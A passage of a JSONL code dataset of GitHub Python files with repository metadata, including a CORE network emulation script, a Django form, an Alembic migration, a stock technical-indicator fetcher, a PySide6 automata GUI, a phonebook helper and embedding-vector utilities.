node_rot_degree = (n_id*node_rot_degree_steps) + switch_rot_degree - 45\n x = radius * np.cos(np.deg2rad(node_rot_degree)) + switch_position.x\n y = radius * np.sin(np.deg2rad(node_rot_degree)) + switch_position.y\n \n node_position = Position(x=x, y=y)\n core_node = Node(type=NodeType.DEFAULT, position=node_position, model=\"host\", name=node.name, services=[\"DefaultRoute\", \"SSH\", \"UserDefined\"])\n response = core.add_node(session_id, core_node)\n node.set_id(response.node_id)\n node_ids.append(response.node_id)\n \n clients_qty = len(node.clients)\n if clients_qty:\n client_rot_degree_steps = 90/clients_qty\n for c_id, client in enumerate(node.clients):\n client_rot_degree = (c_id*client_rot_degree_steps) + node_rot_degree\n x = radius/2 * np.cos(np.deg2rad(client_rot_degree)) + node_position.x\n y = radius/2 * np.sin(np.deg2rad(client_rot_degree)) + node_position.y\n \n client_position = Position(x=x, y=y)\n core_client = Node(type=NodeType.DEFAULT, position=client_position, model=\"PC\", name=client.name, services=[\"DefaultRoute\", \"SSH\", \"UserDefined\"])\n response = core.add_node(session_id, core_client)\n client_ids.append(response.node_id)\n client.set_id(response.node_id)\n \nconfigure_services(session_id, node_ids, startup_node_service_cmd)\nconfigure_services(session_id, client_ids, startup_client_service_cmd)\n\nlink_configs = []\n\n# link configs\nfor i in range(4):\n link_config = LinkOptions(bandwidth=0, delay=int(i*100e3), dup=0, loss=0, jitter=0,)\n link_configs.append(link_config)\n\n# link switches to routers\nfor router in network.routers:\n for router_idx, switch in enumerate(router.switchs):\n iface_data = Interface(id=router_idx, ip4=switch.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, router.id, switch.id, iface_data, options=link_configs[router_idx])\n core.add_link(session_id, router.id, switch.id, iface_data)\n\n # link nodes to switches\n for node_idx,node in enumerate(switch.nodes):\n option = LinkOptions(bandwidth=0, delay=int(node_idx*10e3), dup=0, loss=0, jitter=0,)\n iface_data = Interface(id=node_idx, ip4=node.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, node.id, switch.id, iface_data, options=option)\n core.add_link(session_id, node.id, switch.id, iface_data)\n\n for client_idx,client in enumerate(node.clients):\n option = LinkOptions(bandwidth=0, delay=int(client_idx*10e3), dup=0, loss=0, jitter=0,)\n iface_data = Interface(ip4=client.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, node.id, switch.id, iface_data, options=option)\n core.add_link(session_id, client.id, switch.id, iface_data)\n\n# change session state\ncore.set_session_state(session_id, SessionState.INSTANTIATION)\n\nwhile(True):\n cmd = input('Enter \"end\" to kill core_session: ')\n if cmd == \"end\":\n shutdown_session(session_id)\n break","repo_name":"CleberPeter/SOTARU","sub_path":"deploy_network.py","file_name":"deploy_network.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"26797704267","text":"from django import forms\nfrom django.core import validators\nfrom .models import Trip\n\n\nclass TripForm(forms.ModelForm):\n\n class Meta:\n model = Trip\n exclude = [\"author\"]\n\n widgets = {\n 'year_visited': forms.NumberInput(attrs={\n 'placeholder': 'The year you visited'\n }),\n 'note': forms.Textarea(attrs={\n 'placeholder': 'Some things you remember...'\n }),\n 
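# ClearableFileInput shows the currently stored file and, when the field is optional, a checkbox to clear it without uploading a replacement
            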
'trip_img': forms.ClearableFileInput()\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['country_visited'].label = 'Country Visited'\n self.fields['year_visited'].label = 'Year'\n self.fields['note'].label = 'Note'\n self.fields['trip_img'].label = 'Photo'\n","repo_name":"OliverOC/my-travel-mapper","sub_path":"ollies_travel_hub/scratch_map/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25982580465","text":"\"\"\"Added Tables\n\nRevision ID: df7400c36888\nRevises: 05007d2d1afb\nCreate Date: 2021-10-29 07:24:28.131066\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'df7400c36888'\ndown_revision = '05007d2d1afb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('gender',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('actor',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('dob', sa.DateTime(), nullable=False),\n sa.Column('gender_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('casting',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('actor_id', sa.Integer(), nullable=False),\n sa.Column('movie_id', sa.Integer(), nullable=False),\n sa.Column('casting_date', sa.DateTime(), nullable=False),\n sa.Column('recast_yn', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['actor_id'], ['actor.id'], ),\n sa.ForeignKeyConstraint(['movie_id'], ['movie.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('actor_id', 'movie_id',\n 'casting_date',\n name='UX_actor_movie_date')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('casting')\n op.drop_table('actor')\n op.drop_table('gender')\n # ### end Alembic commands ###\n","repo_name":"GiftXXVI/FSND_Capstone","sub_path":"migrations/versions/df7400c36888_added_tables.py","file_name":"df7400c36888_added_tables.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21806688942","text":"#!/usr/bin/python3.4\n# sorted 应用 \nfrom operator import itemgetter\n\nL = ['bob','about','Zoo','Credit']\n\nprint(sorted(L))\nprint(sorted(L,key = str.lower))\n\ns = [('Bob',75),('Adam',92),('Bart',68),('Lisa',88)]\ndef by_name(t):\n\tprint(t[0]) #取前面的名\n\treturn t[0]\n\ns2 = sorted(s,key = by_name)\nprint(s2)\n\ndef by_score(t):\n\tprint(t[-1]) #取后面的分数\n\treturn t[-1]\n\t\ns3 = sorted(s,key = by_score,reverse = True)\nprint(s3)\n#print(sorted(s,key = itermgetter(0)))\n#print(sorted(s,key = lambda t: t[1]))\n#print(sorted(s,key = itemgetter(1),reverse = True))","repo_name":"kobeding/python","sub_path":"2015/do_sorted.py","file_name":"do_sorted.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19794598616","text":"# -- General configuration ------------------------------------------------\n\nimport os\n\nimport riemann_client\n\nif not os.environ.get('READTHEDOCS', None):\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nmaster_doc = 'index'\nexclude_patterns = ['_build']\n\n# General information about the project.\nproject = u'riemann-client'\ncopyright = u'2014, ' + riemann_client.__author__\nversion = release = riemann_client.__version__\n\n# Add any Sphinx extension module names here, as strings. 
They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.coverage',\n 'sphinx.ext.viewcode'\n]\nautodoc_member_order = 'bysource'\nautoclass_content = 'both'\n","repo_name":"borntyping/python-riemann-client","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"82"} +{"seq_id":"14400882219","text":"from automataValidator import AutomataValidator\nfrom automata import Automata\nfrom PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale,\n QMetaObject, QObject, QPoint, QRect,\n QSize, QTime, QUrl, Qt)\nfrom PySide6.QtGui import (QAction, QBrush, QColor, QConicalGradient,\n QCursor, QFont, QFontDatabase, QGradient,\n QIcon, QImage, QKeySequence, QLinearGradient,\n QPainter, QPalette, QPixmap, QRadialGradient,\n QTransform,QPen)\nfrom PySide6.QtWidgets import (QApplication, QComboBox, QLabel, QMainWindow,\n QMenu, QMenuBar, QPushButton, QSizePolicy,\n QSlider, QSpinBox, QStatusBar, QLineEdit,\n QWidget)\nfrom customwidget import CustomWidget\nfrom PySide6.QtAxContainer import QAxWidget\nimport sys\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def setupUi(self, MainWindow):\n if not MainWindow.objectName():\n MainWindow.setObjectName(u\"MainWindow\")\n MainWindow.resize(900, 550)\n self.actionEspa_ol = QAction(MainWindow)\n self.actionEspa_ol.setObjectName(u\"actionEspa_ol\")\n self.actionIngles = QAction(MainWindow)\n self.actionIngles.setObjectName(u\"actionIngles\")\n self.actionAdicionar_Idioma = QAction(MainWindow)\n self.actionAdicionar_Idioma.setObjectName(u\"actionAdicionar_Idioma\")\n self.centralwidget = QWidget(MainWindow)\n self.centralwidget.setObjectName(u\"centralwidget\")\n self.label = QLabel(self.centralwidget)\n self.label.setObjectName(u\"label\")\n self.label.setGeometry(QRect(20, 10, 71, 21))\n self.spinBox = QSpinBox(self.centralwidget)\n self.spinBox.setObjectName(u\"spinBox\")\n self.spinBox.setGeometry(QRect(20, 70, 131, 22))\n self.spinBox.setMinimum(1)\n self.spinBox.setMaximum(3)\n self.horizontalSlider = QSlider(self.centralwidget)\n self.horizontalSlider.setObjectName(u\"horizontalSlider\")\n self.horizontalSlider.setGeometry(QRect(20, 110, 131, 16))\n self.horizontalSlider.setMinimum(1)\n self.horizontalSlider.setMaximum(3)\n self.horizontalSlider.setOrientation(Qt.Horizontal)\n self.validatePushButton = QPushButton(self.centralwidget)\n self.validatePushButton.setObjectName(u\"pushButton\")\n self.validatePushButton.setGeometry(QRect(20, 140, 131, 24))\n self.label_2 = QLabel(self.centralwidget)\n self.label_2.setObjectName(u\"label_2\")\n self.label_2.setGeometry(QRect(20, 180, 131, 21))\t\n self.widget = CustomWidget(self.centralwidget)\t\n self.widget.setObjectName(u\"widget\")\t\n self.widget.setGeometry(QRect(190, 60, 701, 561))\t\n self.widget.setAutoFillBackground(True)\n self.textEdit = QLineEdit(self.centralwidget)\n self.textEdit.setObjectName(u\"textEdit\")\n self.textEdit.setGeometry(QRect(100, 10, 651, 21))\n self.label_3 = QLabel(self.centralwidget)\n self.label_3.setObjectName(u\"label_3\")\n self.label_3.setGeometry(QRect(20, 50, 131, 16))\n self.comboBox = QComboBox(self.centralwidget)\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.setObjectName(u\"comboBox\")\n self.comboBox.setGeometry(QRect(767, 10, 111, 22))\n 
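# an editable combo box lets the user type a language not in the preset list\n        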
self.comboBox.setEditable(True)\n MainWindow.setCentralWidget(self.widget)\n self.menubar = QMenuBar(MainWindow)\n self.menubar.setObjectName(u\"menubar\")\n self.menubar.setGeometry(QRect(0, 0, 900, 22))\n self.menuIdioma = QMenu(self.menubar)\n self.menuIdioma.setObjectName(u\"menuIdioma\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QStatusBar(MainWindow)\n self.statusbar.setObjectName(u\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.menubar.addAction(self.menuIdioma.menuAction())\n self.menuIdioma.addAction(self.actionEspa_ol)\n self.menuIdioma.addAction(self.actionIngles)\n self.menuIdioma.addAction(self.actionAdicionar_Idioma)\n\n self.retranslateUi(MainWindow)\n\n QMetaObject.connectSlotsByName(MainWindow)\n self.addValidateButtonListener()\n # setupUi\n\n # def paintEvent(self,event):\n # painter = QPainter(self)\n # painter.setPen(QPen(Qt.green, 8, Qt.SolidLine))\n # painter.setBrush(QBrush(Qt.red, Qt.SolidPattern))\n # painter.drawEllipse(200, 200, 70, 70)\n\n def addValidateButtonListener(self):\n self.validatePushButton.clicked.connect(self.validateAutomata)\n\n def validateAutomata(self):\n input = self.textEdit.text()\n self.automataValidator = AutomataValidator(Automata(),list(input))\n if self.automataValidator.isInputStringValidate():\n self.label_2.setText(f'\\nEl caracter \"{input}\" SI es Aceptado')\n else:\n self.label_2.setText(f'\\nEl caracter \"{input}\" NO es Aceptado')\n\n def retranslateUi(self, MainWindow):\n MainWindow.setWindowTitle(QCoreApplication.translate(\"MainWindow\", u\"MainWindow\", None))\n self.actionEspa_ol.setText(QCoreApplication.translate(\"MainWindow\", u\"Espa\\u00f1ol\", None))\n self.actionIngles.setText(QCoreApplication.translate(\"MainWindow\", u\"Ingles\", None))\n self.actionAdicionar_Idioma.setText(QCoreApplication.translate(\"MainWindow\", u\"Adicionar Idioma\", None))\n self.label.setText(QCoreApplication.translate(\"MainWindow\", u\"
Palabra:
\", None))\n self.spinBox.setPrefix(\"\")\n self.validatePushButton.setText(QCoreApplication.translate(\"MainWindow\", u\"Validar\", None))\n self.label_2.setText(QCoreApplication.translate(\"MainWindow\", u\"Estas onfire\", None))\n self.label_3.setText(QCoreApplication.translate(\"MainWindow\", u\"Velocidad de ejecuci\\u00f3n:\", None))\n self.comboBox.setItemText(0, QCoreApplication.translate(\"MainWindow\", u\"Espa\\u00f1ol\", None))\n self.comboBox.setItemText(1, QCoreApplication.translate(\"MainWindow\", u\"Ingles\", None))\n\n self.menuIdioma.setTitle(QCoreApplication.translate(\"MainWindow\", u\"Idioma\", None))\n # retranslateUi\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())","repo_name":"diego-Ballesteros/Automata","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73619172107","text":"import hid\n\n# Update with the vendor_id and product_id for your device\nl = hid.enumerate(65261,24688)\nd = next(item for item in l if item['interface_number'] == 1)\np = d['path']\n# Update this directory\nf = open('/Users/dustin/swiftbar-key/path.log', 'wb')\nf.write(p)\nf.close()","repo_name":"dustincredible/swiftbar-key","sub_path":"get_path.py","file_name":"get_path.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"12996037792","text":"import pandas as pd\nimport numpy as np\nfrom decimal import Decimal\nimport datetime, requests, json, math, sys, os\n\n\ndef get_dates_five_years(testing=False):\n \"\"\"Returns a 2-item tuple of dates in yyyy-mm-dd format 5 years in between today.\n\n Args:\n testing (bool, optional): If set to true, always returns ('2017-02-13', '2022-02-11'). 
Defaults to False.\n\n Returns:\n tuple: (from_date, to_date)\n \"\"\"\n\n if testing:\n return ('2017-02-13', '2022-02-11')\n\n # generate datetime objects\n date_today = datetime.datetime.now()\n date_five_years_ago = date_today - datetime.timedelta(days=round(365.25 * 5))\n\n return (date_five_years_ago.strftime('%Y-%m-%d'), date_today.strftime('%Y-%m-%d'))\n\n\ndef get_trading_dates(stock_ticker, date_range, token):\n exchange = 'PSE'\n url = f\"https://eodhistoricaldata.com/api/eod/{stock_ticker}.{exchange}?api_token={token}&order=a&fmt=json&from={date_range[0]}&to={date_range[1]}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n return data['date']\n\n\ndef get_technical_indicators(data):\n \"\"\"Computes for log stock returns and technical indicators unavailable to EOD (e.g., A/D, CMF, WR).\n Args:\n data (pd.Dataframe): Dataframe containing dates and OHLCV stock data from EOD.\n\n Returns:\n pd.Dataframe: Dataframe containing dates, log stock returns and technical indicators.\n \"\"\" \n\n # get closing prices and volume from data\n try:\n close = data['adjusted_close']\n except KeyError:\n close = data['close']\n\n data_len = len(close)\n\n # compute log stock returns\n stock_returns = [np.NaN]\n for i in range(1, data_len):\n stock_return = math.log(Decimal(close[i]) / Decimal(close[i - 1]))\n stock_returns.append(stock_return)\n\n # compute A/D indicator values\n ad = []\n for i in range(data_len):\n ad_close = Decimal(close[i])\n ad_low = Decimal(data['low'][i])\n ad_high = Decimal(data['high'][i])\n\n if ad_low == ad_high:\n raise Exception(f'Error getting A/D indicator. A period has the same high and low price (zero division error).')\n \n mfm = ((ad_close - ad_low) - (ad_high - ad_close)) / (ad_high - ad_low)\n curr_ad = mfm * data['volume'][i]\n ad.append(curr_ad)\n\n # compute William's %R indicator values\n wr_period = 14\n wr = [np.NaN] * (wr_period - 1)\n\n for i in range(wr_period, data_len + 1):\n wr_high = (data['high'][i - wr_period : i]).max()\n wr_low = (data['low'][i - wr_period : i]).min()\n wr_close = close[i - 1]\n\n if wr_low == wr_high:\n raise Exception(f\"Error getting William's %R indicator. A period has the same highest and lowest price (zero division error).\")\n \n curr_wr = Decimal(wr_high - wr_close) / Decimal(wr_high - wr_low)\n wr.append(curr_wr)\n\n # compute Chaulkin Money Flow indicator\n cmf_period = 20\n\n mfv = []\n cmf = [np.NaN] * (cmf_period - 1)\n\n for i in range(data_len):\n cmf_close = Decimal(close[i])\n cmf_low = Decimal(data['low'][i])\n cmf_high = Decimal(data['high'][i])\n cmf_volume = data['volume'][i]\n\n if cmf_low == cmf_high:\n raise Exception(f'Error getting CMF indicator. A period has the same high and low price (zero division error).')\n\n curr_mfv = (((cmf_close - cmf_low) - (cmf_high - cmf_close)) / (cmf_high - cmf_low)) * cmf_volume\n mfv.append(curr_mfv)\n\n for i in range(cmf_period, data_len + 1):\n curr_cmf = sum(mfv[i - cmf_period : i]) / sum(data['volume'][i - cmf_period : i])\n cmf.append(curr_cmf)\n\n\n # convert to dataframe\n technical_indicators = pd.DataFrame({\n 'date': data['date'],\n 'log_return': stock_returns,\n 'ad' : ad,\n 'wr' : wr,\n 'cmf' : cmf\n })\n\n return technical_indicators\n\n\ndef get_technical_indicator_from_EOD(indicator, period, token, stock_ticker, exchange, date_range):\n \"\"\"Gets daily technical indicator data from EOD API.\n\n Args:\n indicator (str): The indicator for use in EOD API calls. 
(e.g., rsi)\n period (str): The period used in computing the technical indicator.\n token (str): The EOD API key or token.\n stock_ticker (str): The stock ticker being examined (e.g., BPI).\n exchange (str): The stock exchange where the stock is being traded (e.g., PSE)\n date_range (tuple): A tuple of strings indicating the start and end dates for the requested data.\n\n Raises:\n Exception: Raises exception whenever gathered indicator data is insufficient to cover the specified\n date range. This may be fixed by increasing the timedelta used in computing the adjusted_first_day variable\n within the function.\n\n Returns:\n pd.Dataframe: Dataframe containing dates and specified technical indicator data\n \"\"\"\n\n # compute an adjusted from or start date for the API\n first_trading_day_datetime = datetime.datetime.strptime(date_range[0],'%Y-%m-%d')\n adjusted_first_day = ((first_trading_day_datetime) - datetime.timedelta(days=100)).strftime('%Y-%m-%d')\n \n url = f\"https://eodhistoricaldata.com/api/technical/{stock_ticker}.{exchange}?order=a&fmt=json&from={adjusted_first_day}&to={date_range[1]}&function={indicator}&period={period}&api_token={token}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n # remove rows with dates earlier than wanted from date\n for index, row in data.iterrows():\n\n # date of current row entry\n curr_date = datetime.datetime.strptime(row['date'],'%Y-%m-%d')\n\n # remove unneeded earlier row entries\n if curr_date < first_trading_day_datetime:\n data.drop(index, inplace=True)\n\n else:\n break\n\n # reset indices after dropping rows\n data = data.reset_index(drop=True)\n\n\n # raise an exception if the data from EOD API is insufficient to cover the date range specified\n # this error may be fixed by increasing timedelta used in computing adjusted_first_day\n if data['date'][0] != date_range[0]:\n raise Exception(f'Error getting {indicator} indicator for {stock_ticker}.')\n\n return data\n\n\ndef get_technical_data(stock_ticker, date_range):\n \"\"\"Computes and gets technical dataset for a specific stock. 
To be used for model training.\n\n Args:\n stock_ticker ([type]): [description]\n date_range ([type]): [description]\n\n Raises:\n Exception: Raises exception whenever np.NaN is present in the processed technical dataset.\n This can occur if the EOD API data is missing data for a technical indicator on a specific day.\n\n Returns:\n pd.Dataframe: Dataframe representing the dates, log stock returns, and technical indicators.\n \"\"\"\n\n # get API key/token from txt file\n with open('keys/EOD_API_key.txt') as file:\n token = file.readline()\n\n # get first and last trading days in the specified date range\n trading_days = get_trading_dates(stock_ticker, date_range, token)\n first_trading_day = trading_days[0]\n last_trading_day = trading_days.iat[-1]\n\n # adjust and add days to first trading day to be able to compute indicators with periods\n first_trading_day_datetime = datetime.datetime.strptime(first_trading_day,'%Y-%m-%d')\n adjusted_first_day = (first_trading_day_datetime - datetime.timedelta(days=30)).strftime('%Y-%m-%d')\n\n exchange = 'PSE'\n url = f\"https://eodhistoricaldata.com/api/eod/{stock_ticker}.{exchange}?api_token={token}&order=a&fmt=json&from={adjusted_first_day}&to={last_trading_day}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n # # minimize volume data\n # data[\"volume\"] = data[\"volume\"].apply(lambda x: x)\n\n # compute returns and technical indicators not available on EOD\n technical_indicators = get_technical_indicators(data)\n data = data.merge(technical_indicators, on='date')\n\n # remove rows with dates earlier than wanted from date\n for index, row in data.iterrows():\n curr_date = datetime.datetime.strptime(row['date'],'%Y-%m-%d')\n\n if curr_date < first_trading_day_datetime:\n data.drop(index, inplace=True)\n\n else:\n break\n\n # reset indices after dropping rows\n data = data.reset_index(drop=True)\n\n # get available technical indicators from API. 
format: (indicator, period)\n EOD_indicators = [('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14), ('slope', 14), ('stochastic', 14), ('macd', 26)]\n #[('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14), ('slope', 3), ('stochastic', 14), ('macd', 26)]\n #[('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14)]\n\n for indicator, period in EOD_indicators:\n indicator_data = get_technical_indicator_from_EOD(indicator, period, token, stock_ticker, exchange, (first_trading_day, last_trading_day))\n data = data.merge(indicator_data, on='date')\n\n # remove unneeded features/columns in dataframe\n data = data.drop(columns=['open', 'high', 'low', 'adjusted_close', 'volume', 'close'])\n\n if data.isnull().values.any():\n raise Exception(f'Null value found in technical dataset for {stock_ticker}')\n\n # linearly scale up/down indicators to avoid power transform errors\n # for indicator in data.columns:\n # if indicator != 'date':\n # scale_factor = round(math.log10(data[f'{indicator}'].abs().max()))\n # data[f'{indicator}'] = data[f'{indicator}'].apply(lambda x: float(Decimal(x) / Decimal(10 ** (scale_factor))))\n\n return data\n\n\ndef main():\n print(get_technical_data('BPI', get_dates_five_years(testing=True)))\n\n\nif __name__ == '__main__':\n main()","repo_name":"seansom/stock-direction-forecasting","sub_path":"old/get_technical_data.py","file_name":"get_technical_data.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"20395103459","text":"def create(path, initialContacts):\r\n try:\r\n file = open(path, 'r')\r\n except IOError:\r\n print('Создан новый справочник -> ' + path)\r\n file = open(path, 'w')\r\n file.writelines(\"%s\\n\" % contact for contact in initialContacts)\r\n finally:\r\n file.close()\r\n\r\ndef add_cont(file_name, newContact):\r\n data = open(file_name, 'a')\r\n data.write(newContact + \"\\n\")\r\n data.close()\r\n\r\ndef search(file_name, searchMask = \" \") :\r\n phoneBook = read_phoneBook(file_name)\r\n if searchMask != \" \":\r\n phoneBook = list(filter(lambda x: searchMask.lower() in x.lower(), phoneBook))\r\n return phoneBook\r\n\r\ndef delete_contact(file_name, contact):\r\n phoneBook = read_phoneBook(file_name)\r\n phoneBook.remove(contact)\r\n data = open(file_name, 'w')\r\n data.writelines(\"%s\\n\" % contact for contact in phoneBook)\r\n data.close\r\n\r\ndef read_phoneBook(file_name):\r\n data = open(file_name, 'r')\r\n phoneBook = list()\r\n for line in data:\r\n phoneBook.append(line[:-1])\r\n data.close()\r\n return sorted(phoneBook)","repo_name":"yury-poloshkov/Python-Homework","sub_path":"Homework08/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5887161256","text":"import networkx\nimport matplotlib.pyplot as plt\n\ndef input_edges_list():\n \"\"\"считывает список рёбер в форме:\n в первой строке N - число рёбер,\n затем следует N строк из двух слов и одного числа\n слова - названия вершин, концы ребра, а число - его вес\n \n return граф в форме словаря рёбер и соответствующих им весов\n \"\"\"\n N = int(input('Введите количество рёбер:'))\n G = {}\n for i in range(N):\n vertex1, vertex2, weight = input().split()\n weight = float(weight)\n G[(vertex1, vertex2)] = weight\n return G\n \ndef edges_list_to_adjacency_list(E):\n \"\"\"E - граф в форме словаря рёбер и соответствующих им весов\n return граф в форме словаря 
словарей смежности с весами\n \"\"\"\n G = {}\n for vertex1, vertex2 in E:\n weight = E[(vertex1, vertex2)]\n # добавляю ребро (vertex1, vertex2)\n if vertex1 not in G:\n G[vertex1] = {vertex2:weight}\n else: # значит такая вершина уже встречалась\n G[vertex1][vertex2] = weight\n # граф не направленный, поэтому добавляю ребро (vertex2, vertex1)\n if vertex2 not in G:\n G[vertex2] = {vertex1:weight}\n else: # значит такая вершина уже встречалась\n G[vertex2][vertex1] = weight\n return G\n\n\ndef dfs(G, start, called = set(), skelet = set()):\n called.add(start)\n for neighbour in G[start]:\n if neighbour not in called:\n dfs(G, neighbour, called, skelet)\n skelet.add((start, neighbour))\n\n\n\ns = \"\"\"A B 1\nB D 1\nB C 2\nC A 2\nC D 3\nD E 5\"\"\".split('\\n')\nE = {}\nfor line in s:\n a, b, weight = line.split()\n E[(a, b)] = int(weight)\n\nA = edges_list_to_adjacency_list(E)\n\ncalled = set()\nskelet = set()\ndfs(A, 'A', called, skelet)\nprint(called)\nprint(skelet)\n\nG = networkx.Graph(A)\nposition = networkx.spring_layout(G) # positions for all nodes\nnetworkx.draw(G, position)\nnetworkx.draw_networkx_labels(G, position)\nnetworkx.draw_networkx_edge_labels(G, position, edge_labels=E)\n# нарисуем остовное дерево:\nnetworkx.draw_networkx_edges(G, position, edgelist=skelet,\n width=5, alpha=0.5, edge_color='red')\n\nplt.show() # display\n","repo_name":"tkhirianov/kpk2016","sub_path":"graphs/input_graph.py","file_name":"input_graph.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"ru","doc_type":"code","stars":15,"dataset":"github-code","pt":"82"} +{"seq_id":"12560446177","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\nt = int(input())\r\nfor _ in range(t):\r\n st = input().rstrip()\r\n stack = []\r\n flag = True\r\n for el in st:\r\n if el == '(':\r\n stack.append(el)\r\n elif el == ')':\r\n if stack:\r\n stack.pop()\r\n continue\r\n flag = False\r\n break\r\n print('YES' if flag and not stack else 'NO')","repo_name":"Charmull/Algorithm_Python","sub_path":"백준/Silver/9012. 괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6707888412","text":"import os\nimport openai\nimport re\nimport json\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom typing import Any, Optional, Tuple, Dict, List, NamedTuple, Set\nimport scipy\nimport time\n\nfrom pprint import pprint as pprint\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rcParams['figure.dpi'] = 100\n\nfrom basic_utils import *\n\n# A few useful operations on embedding vectors (dictionaries of values\n\ntrimming_and_intersection_tolerance_amount = 1e-10\n\ndef emb_vec_inner_product(emb_vec1, emb_vec2):\n \"\"\"\n This is the key metric for the overlap of two embedding vectors \n \"\"\"\n # loop over all keys in one vector. \n # Get product of value in both vectors. If one is non-existent, then set it to 0. 
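Since the product with a missing key is 0, absent keys simply drop out of the sum.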
\n # This means we only have to loop over one vector \n prod_sum = 0.0\n if len(emb_vec1.keys()) < len(emb_vec2.keys()):\n for key, val in emb_vec1.items():\n val_other = emb_vec2.get(key, 0.0)\n if val * val_other > 0 :\n prod_sum += np.sqrt(val * val_other)\n else:\n for key, val in emb_vec2.items():\n val_other = emb_vec1.get(key, 0.0)\n if val * val_other > 0 :\n prod_sum += np.sqrt(val * val_other)\n return prod_sum\n\ndef trim_embedding_vector(emb_vec, \n embedding_vector_tolerance_fraction=trimming_and_intersection_tolerance_amount):\n \"\"\"\n Returns a shorter vector, which contains terms which sum to \n 1 - embedding_vector_tolerance_fraction. So most of them.\n \"\"\"\n \n emb_vec_vals = np.array(list(emb_vec.values()))\n emb_vec_vals.sort() # from low to high \n emb_vec_cumulative_threshold = np.sum(emb_vec_vals) * embedding_vector_tolerance_fraction\n \n emb_vec_vals_sorted_cumsum = np.cumsum(emb_vec_vals)\n num_below_threshold = len(np.where(emb_vec_vals_sorted_cumsum < emb_vec_cumulative_threshold)[0])\n if num_below_threshold > 0:\n threshold_val = emb_vec_vals[num_below_threshold - 1] \n # need to be strictly greater than this to be included in the trimmed vector\n else:\n threshold_val = 0.0\n\n emb_vec_trimmed = {k: v for k, v in emb_vec.items() if v > threshold_val}\n \n return emb_vec_trimmed\n\ndef emb_vec_weighted_union_of_nodes(node_title_list, knowledgeGraph):\n \"\"\"\n Gets an embedding vector which is a weighted sum of embedding vectors for the nodes.\n The intention is to find an embedding which characterizes the unique aspects of this set of nodes.\n That is it emphasizes the less common nodes more.\n\n Have to pass in knowledge graph as argument because union needs to know about \n meta data of nodes, in the knowledge graph\n\n There are two types of weighting used here. \n 1. First, the relative weighting of each node is adjusted since\n we don't want to use concepts associated with many other things. Want to use unique things.\n 2. 
